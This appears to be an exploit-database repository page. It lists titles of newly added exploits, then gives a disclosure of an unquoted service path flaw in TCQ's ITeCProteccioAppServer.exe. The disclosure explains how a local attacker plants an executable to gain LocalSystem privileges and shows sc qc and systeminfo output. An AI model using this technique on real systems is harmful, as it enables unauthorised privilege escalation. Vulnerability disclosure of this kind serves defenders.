be24992411
42 changes to exploits/shellcodes UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path Wondershare Dr.Fone 11.4.10 - Insecure File Permissions ExifTool 12.23 - Arbitrary Code Execution Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) Akka HTTP 10.1.14 - Denial of Service USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor Bookeen Notea - Directory Traversal SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure DLINK DIR850 - Insecure Access Control DLINK DIR850 - Open Redirect Apache CouchDB 3.2.1 - Remote Code Execution (RCE) Tenda HG6 v3.3.0 - Remote Command Injection Google Chrome 78.0.3904.70 - Remote Code Execution PyScript - Read Remote Python Source Code DLINK DAP-1620 A1 v1.01 - Directory Traversal Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) ImpressCMS v1.4.4 - Unrestricted File Upload Microfinance Management System 1.0 - 'customer_number' SQLi WebTareas 2.4 - Blind SQLi (Authenticated) WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) Magento eCommerce CE v2.3.5-p2 - Blind SQLi Bitrix24 - Remote Code Execution (RCE) (Authenticated) CSZ CMS 1.3.0 - 'Multiple' Blind SQLi Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) e107 CMS v3.2.1 - Multiple Vulnerabilities Anuko Time Tracker - SQLi (Authenticated) TLR-2005KSH - Arbitrary File Upload Explore CMS 1.0 - SQL Injection Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS) Beehive Forum - Account Takeover MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Joomla Plugin SexyPolling 2.1.7 - SQLi WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
32 lines
No EOL
1.3 KiB
Text
32 lines
No EOL
1.3 KiB
Text
# Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path
|
|
# Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg
|
|
# Discovery Date: 2022-04-25
|
|
# Vendor Homepage: https://itec.es/programas/
|
|
# Vulnerability Type: Unquoted Service Path Privilege Escalation
|
|
# Tested on OS: Microsoft Windows 11 Home
|
|
|
|
To properly exploit this vulnerability,
|
|
the local attacker must insert an executable file in the path of the service.
|
|
Upon service restart or system reboot, the malicious code will be run
|
|
with elevated privileges.
|
|
|
|
|
|
C:\Users\edgar>sc qc "ITeCProteccioAppServer"
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: ITeCProteccioAppServer
|
|
TIPO : 110 WIN32_OWN_PROCESS (interactive)
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : ITeCProteccioAppServer
|
|
DEPENDENCIAS : RPCSS
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem
|
|
|
|
C:\Users\edgar>systeminfo
|
|
|
|
Nombre de host: DESKTOP-0DL5SID
|
|
Nombre del sistema operativo: Microsoft Windows 11 Home
|
|
Versión del sistema operativo: 10.0.22000 N/D Compilación 22000 |